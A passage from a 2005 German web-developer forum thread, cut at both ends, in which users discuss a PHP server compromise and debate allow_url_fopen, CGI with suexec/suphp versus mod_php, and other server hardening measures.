Tricks: <a href="http://aktuell.de.selfhtml.org/tippstricks/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/tippstricks/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821331#m821331 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T11:15:20Z 2005-06-10T11:15:20Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <p>Angenommen man verwendet (wie ich es eigentlich eher empfehlen würde) CGI<br> mit suphp, so dass der CGI-Prozess immer unter der UID des Anwenders läuft,<br> dann wäre das wohl nicht passiert (mit dem fehlgeschlagenen restart).</p> </blockquote> <p>Vermutlich nicht. Bei suexec wird ja nicht fork() benutzt, um die Binary<br> letztenendes zu starten, das Environment wird also nicht vererbt.</p> <blockquote> <p>Wie merkt man sowas am einfachsten, ohne jetzt ein dickes IDS-Geschütz<br> aufzufahren? Am besten wohl durch regelmäßiger Port-Scans von außerhalb,<br> oder?</p> </blockquote> <p>Portscans und Aufmerksamkeit, ja. Regelmäßig halt die Prozessliste anschauen<br> und so.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Sei ε kleiner Null.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821337#m821337 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T08:15:26Z 2005-06-10T08:15:26Z Haltet eure PHP-Software aktuell! <p>你好 Klaus,</p> <blockquote> <p>Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee<br> Anzeige oder redest du mit dem nur?</p> </blockquote> <p>Den Fritzen, der den Code eingeschleust hat? Ne, das bringt nichts, der kommt<br> irgendwo aus Russland, Brasilien oder sonstwoher.</p> <p>Den Typen, der die Software nicht aktualisiert hat? Was bringts den<br> anzuzeigen? Das ist höchstens fahrlässig, sicher nicht böswillig. Ich<br> bezweifle, dass er sich darüber bewusst war, was für Konsequenzen das haben<br> kann.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Die Wirklichkeit hat weder ein Inneres, noch ein Äußeres, noch ein Zentrum.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821334#m821334 TomIRL http://thomas.giesau.com 2005-06-10T08:16:11Z 2005-06-10T08:16:11Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Hallo,</p> <blockquote> <p>Das bringt nichts. So blöd sind die Jungs ja nun nicht. Da wird mit chr() und<br> ähnlichen Mitteln gearbeitet. Ich habe inzwischen aber den Schuldigen<br> gefunden.</p> </blockquote> <p>Mich wurde mal interesieren was dann mit dem passiert. Machst du da nee Anzeige oder redest du mit dem nur?</p> </blockquote> <p>Der Schuldige, vermute ich, ist ein unbedarfter User, der irgendein buggy Script zum Einsatz gebracht hat.<br> Derjenige, der das Teil auf den Server bugsiert hat, der sitzt irgendwo in Timbuktu, den bekommt so oder so nicht.<br> Was würdest Du tun?</p> <p>TomIRL</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821335#m821335 Fabienne 2005-06-10T09:01:44Z 2005-06-10T09:01:44Z Haltet eure PHP-Software aktuell! <p>! Ollah</p> <p>Was spricht den gegen eine Anzeige? Das ist immerhin böswilliger/vorsätzlicher Code... Evtl. hat er selbe schon merhmals den gleichen Mist gemacht und ist schon bekannt....</p> <p>Greets</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821336#m821336 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T09:03:02Z 2005-06-10T09:03:02Z Haltet eure PHP-Software aktuell! <p>你好 Fabienne,</p> <blockquote> <p>Was spricht den gegen eine Anzeige? Das ist immerhin<br> böswilliger/vorsätzlicher Code... Evtl. hat er selbe schon merhmals den<br> gleichen Mist gemacht und ist schon bekannt....</p> </blockquote> <p>Versuch mal jemanden wegen einer solchen Lapallie ausserhalb des EU-Raums zu<br> fassen zu kriegen, z. B. wie in diesem Fall in Brasilien.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Coincidence?! I THINK NOT!!<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821339#m821339 TomIRL http://thomas.giesau.com 2005-06-10T08:13:28Z 2005-06-10T08:13:28Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Hi,<br> ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.</p> </blockquote> <p>Toller Tip!<br> Ich empfehle den Rechner gar nicht erst anzuschalten.<br> Das ist die sicherste Methode unerwünschten Code zu verbieten, besser jedenfalls als irgendwelche nützlichen Funktionen zu disablen.</p> <p>TomIRL</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821340#m821340 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T08:16:48Z 2005-06-10T08:16:48Z Haltet eure PHP-Software aktuell! <p>你好 TomIRL,</p> <blockquote> <blockquote> <p>ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.</p> </blockquote> <p>Toller Tip!</p> </blockquote> <p>Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist einer<br> der Haupt-Verursacher für solche Sicherheitsprobleme.</p> <blockquote> <p>Ich empfehle den Rechner gar nicht erst anzuschalten.<br> Das ist die sicherste Methode unerwünschten Code zu verbieten, besser<br> jedenfalls als irgendwelche nützlichen Funktionen zu disablen.</p> </blockquote> <p>Dein Sarkasmus ist fehl am Platze.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Unsere Vorstellungen von der Ewigkeit sind genauso nuetlich wie die Mutmassungen eines Kuehkens ueber die Aussenwelt bevor es die Eierschale aufbricht.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821368#m821368 Zeromancer zeromancer007-selfhtml@yahoo.de 2005-06-10T08:43:25Z 2005-06-10T08:43:25Z Sarkasmus <p>Hallo CK,</p> <blockquote> <p>Dein Sarkasmus ist fehl am Platze.</p> </blockquote> <p>ich habe manchmal den Eindruck, dass TomIRL der <ironie>einzige Forumsteilnehmer mit entsprechendem Wissen</ironie> ist (vgl. <a href="https://forum.selfhtml.org/?t=109215&m=681884" rel="noopener noreferrer">ein Auszug</a>). Zumindest an seinen Formulierungen sollte er "feilen".</p> <p>Mit freundlichen Grüßen</p> <p>André</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821341#m821341 TomIRL http://thomas.giesau.com 2005-06-10T08:58:29Z 2005-06-10T08:58:29Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>你好 TomIRL,</p> <blockquote> <blockquote> <p>ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.</p> </blockquote> <p>Toller Tip!</p> </blockquote> <p>Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist einer<br> der Haupt-Verursacher für solche Sicherheitsprobleme.</p> </blockquote> <p>Hauptverursacher ist IMHO der User mit dem Buggy Script.<br> Wie willst du ohne allow_url_fopen sonst beispielsweise Datenbestände von verschiedenen Servern aktualisieren?<br> Problematisch ist es allemal irgendwas auf Servern ausführbar zu machen, das ist aber kein PHP Problem und erst recht kein Problem von allow_url_fopen.</p> <p>TomIRL</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821343#m821343 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T09:02:02Z 2005-06-10T09:02:02Z Haltet eure PHP-Software aktuell! <p>你好 TomIRL,</p> <blockquote> <blockquote> <blockquote> <blockquote> <p>ich rate auch in der php.ini allow_url_fopen auf Off zu stellen.</p> </blockquote> <p>Toller Tip!</p> </blockquote> <p>Richtig, der Tipp ist gar nicht mal so schlecht. allow_url_fopen() ist<br> einer der Haupt-Verursacher für solche Sicherheitsprobleme.</p> </blockquote> <p>Hauptverursacher ist IMHO der User mit dem Buggy Script.</p> </blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP.</p> <blockquote> <p>Wie willst du ohne allow_url_fopen sonst beispielsweise Datenbestände von<br> verschiedenen Servern aktualisieren?</p> </blockquote> <p>Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen<br> nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf<br> externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme<br> gleich erschlagen.</p> <blockquote> <p>Problematisch ist es allemal irgendwas auf Servern ausführbar zu machen,<br> das ist aber kein PHP Problem und erst recht kein Problem von<br> allow_url_fopen.</p> </blockquote> <p>Es ist eindeutig eine konzeptionelle Schwäche von PHP.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Echte Hacker benutzen Aexte. (Thomas Walter in de.org.ccc)<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821342#m821342 Bio aceop@gmx.net 2005-06-10T11:11:28Z 2005-06-10T11:11:28Z Haltet eure PHP-Software aktuell! <p>Sup!</p> <blockquote> <p>Hauptverursacher ist IMHO der User mit dem Buggy Script.</p> </blockquote> <p>Aber das es sich um PHP-Programmierer handelt kann man nicht mehr vom Nutzer erwarten. Darum sollten eigentlich alle Funktionen abgestellt werden.</p> <p>Gruesse,</p> <p>Bio</p> <div class="signature">-- <br> Never give up, never surrender!!! </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821365#m821365 TomIRL http://thomas.giesau.com 2005-06-10T09:16:30Z 2005-06-10T09:16:30Z Haltet eure PHP-Software aktuell! <p>Moin,</p> <blockquote> <p>Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen<br> nutzen, um das zu tun? Gäbe es Extra-Funktionen für den Zugriff auf<br> externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme<br> gleich erschlagen.</p> </blockquote> <p>Hm darüber hab ich mir ehrlich gesagt noch keine Gedanken gemacht.<br> Du meinst also wenn man eine Funktion, die ausschliesslich "Text" einliest und alle anderen Sachen draußen läßt?</p> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821344#m821344 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T10:59:30Z 2005-06-10T10:59:30Z Haltet eure PHP-Software aktuell! <p>Hallo Christian!</p> <blockquote> <blockquote> <p>Hauptverursacher ist IMHO der User mit dem Buggy Script.</p> </blockquote> </blockquote> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP.</p> </blockquote> <p>Die da wäre? Was ich im Moment mitbekomme, erfolgt ein wirklich großer Teil aktueller Angriffe über awstat - awstat.pl!</p> <p>Das Problem ist IMHO, dass man weniger können muss um PHP zu schreiben, und entsprechend viele schlechte PHP-Programmierer und damit unsichere PHP-Scripte gibt es.</p> <blockquote> <p>Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen<br> nutzen, um das zu tun?</p> </blockquote> <p>Warum nicht? Man kann auch mysql_query() so nutzen, dass eine Sicherheitslücke entsteht - was soll man dagegen machen?</p> <blockquote> <p>Gäbe es Extra-Funktionen für den Zugriff auf<br> externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme<br> gleich erschlagen.</p> </blockquote> <p>Ich hoffe sehr, dass es <a href="http://pecl.php.net/package/pecl_http/" rel="nofollow noopener noreferrer">PECL::HTTP</a> noch in PHP 5.1 schafft (beta soll AFAIK heute kommen), das wäre mal sehr viel eleganter als diese nervige Geschichte mit fsockopen(): <a href="http://dev.iworks.at/ext-http/http-functions.html.gz" rel="nofollow noopener noreferrer">http://dev.iworks.at/ext-http/http-functions.html.gz</a></p> <p>Allerdings verwende ich für sowas schon seit längerem <a href="http://pear.php.net/package/HTTP_Request" rel="nofollow noopener noreferrer">PEAR::HTTP_Request</a> (ist ja quasi auch ein Bestandateil von PHP - ähnlich wie ein CPAN-Modul).</p> <p>allow_url_fopen habe ich abgeschaltet. Ich finde allow_url_fopen selber schlecht, weil sobald sich irgendwo eine entsprechende, kleine Lücke einschleicht - ob es ein eigenes Script ist oder ein fremdes, oder eine fertige Software - ist ein Angreifer sofort in der Lage eigenen PHP-Code auszuführen. Gut, sagen wir Du nutzt disable_function - es gibt aber noch andere Mittel und Wege fremde Extensions (AFAIR z.B. curl, mssql, oracle...) dazu zu bewegen, Programme auszuführen.</p> <p>IMHO sollten User nur Prozesse unter eigener UID laufen lassen können (suexec/suphp für CGI), entsprechend sollen User nur die Programme auf der Kommandozeile ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit entfernen, oder wenigstens chmod (0700).</p> <p>Allerdings betreue ich keine Server mit fremden Usern und habe da möglicherweise gut Reden ;-)</p> <p>Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Feature Artikel: <a href="http://aktuell.de.selfhtml.org/artikel/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/artikel/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821346#m821346 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T11:12:51Z 2005-06-10T11:12:51Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <blockquote> <blockquote> <p>Hauptverursacher ist IMHO der User mit dem Buggy Script.</p> </blockquote> </blockquote> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP.</p> </blockquote> <p>Die da wäre?</p> </blockquote> <p>Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> <blockquote> <blockquote> <p>Warum sollte ich include(), fopen() oder ähnliche _Datei_-Operationen<br> nutzen, um das zu tun?</p> </blockquote> <p>Warum nicht?</p> </blockquote> <p>Weil sie für _Datei_-Operationen gedacht sind. Nicht für<br> Netzwerk-Operationen. Wenn man sowas transparent verwischt muss was übles<br> bei rauskommen. Einmal nicht aufgepasst und schon machts krach-bumm.</p> <blockquote> <p>Man kann auch mysql_query() so nutzen, dass eine Sicherheitslücke<br> entsteht - was soll man dagegen machen?</p> </blockquote> <p>Da kann man nichts gegen machen, das kann immer mal passieren. Aber man<br> kann unnötige Risikofaktoren ausschliessen.</p> <blockquote> <p>allow_url_fopen habe ich abgeschaltet.</p> </blockquote> <p>Leider scheinen das einige unserer Kunden zu brauchen. Wobei ich sagen<br> muss, dass ich überlege, das trotzdem abzuschalten.</p> <blockquote> <p>Ich finde allow_url_fopen selber schlecht, weil sobald sich irgendwo<br> eine entsprechende, kleine Lücke einschleicht - ob es ein eigenes Script<br> ist oder ein fremdes, oder eine fertige Software - ist ein Angreifer<br> sofort in der Lage eigenen PHP-Code auszuführen.</p> </blockquote> <p>Ja, eben!</p> <blockquote> <p>IMHO sollten User nur Prozesse unter eigener UID laufen lassen können<br> (suexec/suphp für CGI),</p> </blockquote> <p>Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur<br> (normalerweise installierten) Modul-Version aufweist.</p> <blockquote> <p>entsprechend sollen User nur die Programme auf der Kommandozeile<br> ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit<br> entfernen, oder wenigstens chmod (0700).</p> </blockquote> <p>Das hätte in diesem Fall auch nichts geholfen. Perl zu verbieten ist...<br> naja, leicht lächerlich ;-) Da hilft nur eine vernünftige Administration,<br> der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.<br> Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann<br> man da sehr viel recht schön einschränken.</p> <blockquote> <p>Allerdings betreue ich keine Server mit fremden Usern und habe da<br> möglicherweise gut Reden ;-)</p> </blockquote> <p>Ja ;-)</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Die Stärke des Geistes ist unendlich, die Muskelkraft dagegen ist begrenzt.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821345#m821345 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-13T09:38:48Z 2005-06-13T09:38:48Z Haltet eure PHP-Software aktuell! <p>Hallo Christian!</p> <blockquote> <blockquote> <p>Gäbe es Extra-Funktionen für den Zugriff auf<br> externe Ressourcen (z. B. über HTTP), dann wären die meisten Probleme<br> gleich erschlagen.</p> </blockquote> <p>Ich hoffe sehr, dass es <a href="http://pecl.php.net/package/pecl_http/" rel="nofollow noopener noreferrer">PECL::HTTP</a> noch in PHP 5.1 schafft (beta soll AFAIK heute kommen), das wäre mal sehr viel eleganter als diese nervige Geschichte mit fsockopen(): <a href="http://dev.iworks.at/ext-http/http-functions.html.gz" rel="nofollow noopener noreferrer">http://dev.iworks.at/ext-http/http-functions.html.gz</a></p> </blockquote> <p>Hm, blöderweise ist PHP mit der Zeit derart mit Extensions aufgebläht worden, dass sie jetzt sehr rigeros Extensions aus dem core rausschmeißen, und nur noch sehr wenige neue Extensions aufnehmen. IMHO wäre hier eine HTTP-Extension ein wirklich guter Kanditat, weil genau sowas fehlt (das merkt man ja auch an den vielen Fragen bzgl. HTTP-Requests... z.B. hier im Forum). Entsprechend soll die HTTP-Extension aus PECL leider auch nicht aufgenommen werden (<a href="http://news.php.net/php.internals/16596" rel="nofollow noopener noreferrer">Antwort von Derick Rethans auf php.internals</a>), was ich ehrlich gesagt nicht richtig finde. Denn wenn diese Extension in PECL liegt, wird sie doch niemals Beachtung finden und verwendet werden (im Gegensatz zu so wirklich speziellen Sachen wie xdebug, bcompiler...).</p> <p>Wenn also Du oder jemand anders noch ein gutes Argument kennt... ;-)</p> <p>Viele Grüße<br> Andreas</p> <p>PS: Dein Argument "wären die meisten Probleme gleich erschlagen" ist ja eigentlich kein richtiges Argument, weil man die Leute nur mit einem BC-Bruch dazu zwingen könnte, und auch heute könnte man an Stelle von include() ja wenigstens mal readfile() verwenden - wenn man keinen PHP-Code ausführen will. Macht aber auch kaum jemand.</p> <div class="signature">-- <br> SELFHTML Linkverzeichnis: <a href="http://aktuell.de.selfhtml.org/links/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/links/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821351#m821351 Andreas Korthaus andreas.korthaus@selfhtml.org 2005-06-10T12:05:29Z 2005-06-10T12:05:29Z Haltet eure PHP-Software aktuell! <p>Hallo Christian!</p> <blockquote> <p>?? Andreas,</p> </blockquote> <p>so langsam würde ich ja schon gerne mal sehen was da an Stelle der Fragezeichen stehen müsste ;-)</p> <blockquote> <blockquote> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP.</p> </blockquote> <p>Die da wäre?</p> </blockquote> <p>Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> </blockquote> <p>So schlecht finde ich die Idee nicht. Es bietet die Möglichkeit sehr einfach Dateien von einem auf den anderen Server zu übertragen. Sicher sind auf der Transport-Schicht dazwischen keine "Dateien" bekannt, aber an den beiden Endpunkten der Kommunikation normalerweise schon.</p> <p>Das Problem ist dass man es IMHO zu unvorsichtig aktiviert hat, die DAUs waren begeistert, und heute benutzen das so viele Scripte, dass man es kaum noch abschalten kann - obwohl die Argumente dafür immer zwingender werden.</p> <p>IMHO war es der größte Fehler, dass auf die zusätzliche Gefahr der diese Funktionen aufgrund von allow_url_fopen ausgesetzt sind, nicht wikrlich eindringlich hingewiesen wurde. Leider sagen viele PHP-Devs, "sollen die Admins/Programmier sich doch bitte drum kümmern, die müssen das selber einschätzen können, die müssen selber wissen was sie machen, wir können nicht verhindern dass sich die Leute reihenweise in die Füße schießen...".</p> <blockquote> <p>Einmal nicht aufgepasst und schon machts krach-bumm.</p> </blockquote> <p>Eigentlich ist das Problem dasselbe wie lokal (ohne allow_url_fopen), mit dem kleinen aber feinen Unterschied, dass die Auswirkungen erheblich verheerender sind.</p> <blockquote> <blockquote> <p>IMHO sollten User nur Prozesse unter eigener UID laufen lassen können<br> (suexec/suphp für CGI),</p> </blockquote> <p>Das sagst du so. Das führt dazu, dass PHP einige Unterschiede zur<br> (normalerweise installierten) Modul-Version aufweist.</p> </blockquote> <p>Die Unterschiede sind doch wohl marginal. Eigentlich betrifft es ja nur HTTP-Header Geschichten. Der wichtigste (Location) funktioniert ganz normal, das einzige was halt wirklich fehlt ist HTTP-Auth. Aber das wird so häufig auch nicht verwendet. Abgesehen davon setzen alle großen Provider die ich kenne php-cgi ein (domainfactory, 1&1, Schlund, AFAIR auch hosteurope und strato), also scheint das auch irgendwie zu gehen. Ich habe normalen Webspace bisher noch nie mit mod_php gehabt, und das finde ich aus heutiger Sicht auch sehr sinnvoll.</p> <p>Ich finde den Gedanken gut dass User nicht Daten anderer User manipulieren können, so bleiben solche Fehltritte wie in deinem Fall wenigstens auf den einen User beschränkt, das heißt, der Angreifer kann mit dem Account machen was er will, aber er kann nicht auf Daten anderer User zugreifen.</p> <p>Besonders wild wirds doch bei mod_php wenn der Webserver in ein Verzeichnis schreiben soll (upload -> chmod(0777) usw.).</p> <blockquote> <blockquote> <p>entsprechend sollen User nur die Programme auf der Kommandozeile<br> ausführen können, die sie evtl. benötigen, alles andere nach Möglichkeit<br> entfernen, oder wenigstens chmod (0700).</p> </blockquote> <p>Das hätte in diesem Fall auch nichts geholfen.</p> </blockquote> <p>Ich dachte er hätte den Kram mit wget runtergeladen?</p> <p>Aber OK, er hätte den Kram vermutlich auch Zeile für Zeile mit echo in eine lokale Datei schreiben können...</p> <blockquote> <p>Perl zu verbieten ist...<br> naja, leicht lächerlich ;-)</p> </blockquote> <p>klar.</p> <blockquote> <p>Da hilft nur eine vernünftige Administration,<br> der Angreifer konnte ja nichts ausrichten, er hatte “nur” Apache-Rechte.</p> </blockquote> <p>Er hat es immerhin geschafft dass der Webserver offline war. Wenn auch nicht absichtlich. Er hätte auf die Daten aller Kunden Zugriff, könnte alle DB-Zugangsdaten auslesen und wer weiß was noch alles. IMHO sollte eine gute Konfiguration sowas vermeiden! Das System muss komplett auf aktuellem Stand sein, denn es reicht ein kleine Lücke im Kernel oder einem Programm was unter root läuft, und schon hat er selber root und kann machen was er will.</p> <p>Was ich bisher aber nicht wüßte wie ich es vermeide, ist es z.B. DB-Zugangsdaten in Scripten (anderer Kunden) vor so einem Angreifer zu schützen. Solange der Webserver diese Zugangsdaten lesen kann, kann der Angreifer das auch. Man kann zwar ein Directory-Listing verhindern, dass er nicht sofort sieht wo die anderen Kundendaten liegen, aber darauf würde ich mich jetzt eher nicht verlassen wollen. Man kann auch verhindern dass er in der Shell auf andere Kunden-Verzeichnisse zugreift - aber kann man auch verhindern dass er mit dem Apachen zugreift? Ich meine - angenommen ich kenne das Verzeichnis anderer Kunden, was hält mich davon ab per .htaccess und z.B. Alias mal ein bisschen in den Verzeichnissen zu stöbern, und mit Dateien dort als text/plain ausliefern zu lassen?</p> <blockquote> <p>Und der darf nicht sonderlich viel... wenn man mit ACLs arbeitet, kann<br> man da sehr viel recht schön einschränken.</p> </blockquote> <p>OK, ACLs, sicher nicht verkehrt. Ich verwende noch das <a href="http://grsecurity.net/" rel="nofollow noopener noreferrer">grsec-patch</a> (proaktive Sicherheit gegen gewissen Angriffe, PAX...), gibts bei Gentoo als grsec-sources. Hat den Vortei, dass einige Exploits (nicht alle) auf so einem System nicht funktionieren.</p> <blockquote> <blockquote> <p>Allerdings betreue ich keine Server mit fremden Usern und habe da<br> möglicherweise gut Reden ;-)</p> </blockquote> <p>Ja ;-)</p> </blockquote> <p>Also ich hätte jetzt gedacht mod_php auf Hosting-Servern sei inzwischen mehr oder weniger ausgestorben ;-)</p> <p>Grüße<br> Andreas</p> <div class="signature">-- <br> SELFHTML Tipps & Tricks: <a href="http://aktuell.de.selfhtml.org/tippstricks/" rel="nofollow noopener noreferrer">http://aktuell.de.selfhtml.org/tippstricks/</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821347#m821347 wahsaga http://wazgnuks.net/ 2005-06-10T12:15:16Z 2005-06-10T12:15:16Z Haltet eure PHP-Software aktuell! <p>hi,</p> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP. [...]<br> Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> </blockquote> <p>ich denke gerade das entspricht dem konzept von unix/linux, _alles_ als ... wie heißt das noch, resource ist sicher der falsche begriff, zu betrachten - egal ob file oder remote?</p> <p>gruß,<br> wahsaga</p> <div class="signature">-- <br> /voodoo.css:<br> #GeorgeWBush { position:absolute; bottom:-6ft; } </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821348#m821348 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T12:22:22Z 2005-06-10T12:22:22Z Haltet eure PHP-Software aktuell! <p>你好 wahsaga,</p> <blockquote> <blockquote> <p>Hauptverursacher ist eine konzeptionelle Schwäche in PHP. [...]<br> Das transparente Verwischen von Datei- und Netzwerk-Zugriffen.</p> </blockquote> <p>ich denke gerade das entspricht dem konzept von unix/linux, _alles_<br> als ... wie heißt das noch, resource ist sicher der falsche begriff, zu<br> betrachten - egal ob file oder remote?</p> </blockquote> <p>So stimmt das nicht.</p> <p>Das Konzept von Unix ist: alles im Lokalen System ist eine Datei.<br> Netzwerk-Verbindungen und ähnliches werden jedoch (aus bekannten Gründen)<br> extra behandelt.</p> <p>Ist die Verbindung erstmal hergestellt, wird das Handle wieder wie eine<br> Datei behandelt, das ist allerdings wahr und auch gut so.</p> <p>Wenn es dich interessiert kann ich dir den “Advanced Programming in the<br> Unix(tm) Environment” empfehlen.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Auf der ganzen Welt gibt es nichts Weicheres und Schwaecheres als Wasser. Doch in der Art, wie es dem Harten zusetzt, kommt nichts ihm gleich.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821349#m821349 wahsaga http://wazgnuks.net/ 2005-06-10T12:30:31Z 2005-06-10T12:30:31Z Haltet eure PHP-Software aktuell! <p>hi,</p> <blockquote> <p>So stimmt das nicht.</p> <p>Das Konzept von Unix ist: alles im Lokalen System ist eine Datei.<br> Netzwerk-Verbindungen und ähnliches werden jedoch (aus bekannten Gründen)<br> extra behandelt.</p> </blockquote> <p>dann hatte ich da wohl etwas nicht ganz zutreffendes im hinterkopf.</p> <blockquote> <p>Ist die Verbindung erstmal hergestellt, wird das Handle wieder wie eine<br> Datei behandelt, das ist allerdings wahr und auch gut so.</p> </blockquote> <p>hm, dann war's vielleicht eher das, was ich meinte.</p> <p>ja, das scheint auch der bessere weg zu sein, als automatisch die verbindung herzustellen, wenn versucht wird remote auf etwas zuzugreifen.<br> dass man anschließend das lesen aus/schreiben in dieses handle analog wie beim dateizugriff behandelt, ist allerdings praktisch.</p> <blockquote> <p>Wenn es dich interessiert kann ich dir den “Advanced Programming in the<br> Unix(tm) Environment” empfehlen.</p> </blockquote> <p>danke, aber derzeit nicht :-)</p> <p>gruß,<br> wahsaga</p> <div class="signature">-- <br> /voodoo.css:<br> #GeorgeWBush { position:absolute; bottom:-6ft; } </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821350#m821350 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T12:32:43Z 2005-06-10T12:32:43Z Haltet eure PHP-Software aktuell! <p>你好 wahsaga,</p> <blockquote> <p>ja, das scheint auch der bessere weg zu sein, als automatisch die<br> verbindung herzustellen, wenn versucht wird remote auf etwas zuzugreifen.</p> </blockquote> <p>Sagichdoch ;-))</p> <blockquote> <p>dass man anschließend das lesen aus/schreiben in dieses handle analog wie<br> beim dateizugriff behandelt, ist allerdings praktisch.</p> </blockquote> <p>Ja, und das ist auch gewollt so. So kann man grosse Code-Teile problemlos<br> umlenken auf lokale Dateien oder Netzwerk-Verbindungen.</p> <p>再见,<br> 克里斯蒂安</p> <div class="signature">-- <br> Das Sein entsteht aus dem Nicht-Sein.<br> <a href="http://wwwtech.de/" rel="noopener noreferrer">http://wwwtech.de/</a><br> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821364#m821364 Benjamin Wilfing benjamin.wilfing@selfhtml.org http://wilfing-home.de 2005-06-10T12:19:12Z 2005-06-10T12:19:12Z Haltet eure PHP-Software aktuell! <p>Hi Andreas,</p> <blockquote> <blockquote> <p>?? Andreas,</p> </blockquote> <p>so langsam würde ich ja schon gerne mal sehen was da an Stelle der Fragezeichen stehen müsste ;-)</p> </blockquote> <p>chinesische Zeichen. ;-) Bei mir sieht das so aus: <img src="http://wilfing-home.de/selfforum/chinazeug.png" alt="" loading="lazy">.</p> <p>Viele Grüße<br> Benjamin</p> <div class="signature">-- <br> <a href="http://defunced.de/selftreffen" rel="nofollow noopener noreferrer">SELFHTML-Treffen 2005</a> </div> https://forum.selfhtml.org/self/2005/jun/10/haltet-eure-php-software-aktuell/821352#m821352 Christian Kruse ckruse@wwwtech.de http://wwwtech.de/ 2005-06-10T12:26:20Z 2005-06-10T12:26:20Z Haltet eure PHP-Software aktuell! <p>你好 Andreas,</p> <blockquote> <blockquote> <p>?? Andreas,</p> </blockquote> <p>so langsam würde ich ja schon gerne mal sehen was da an 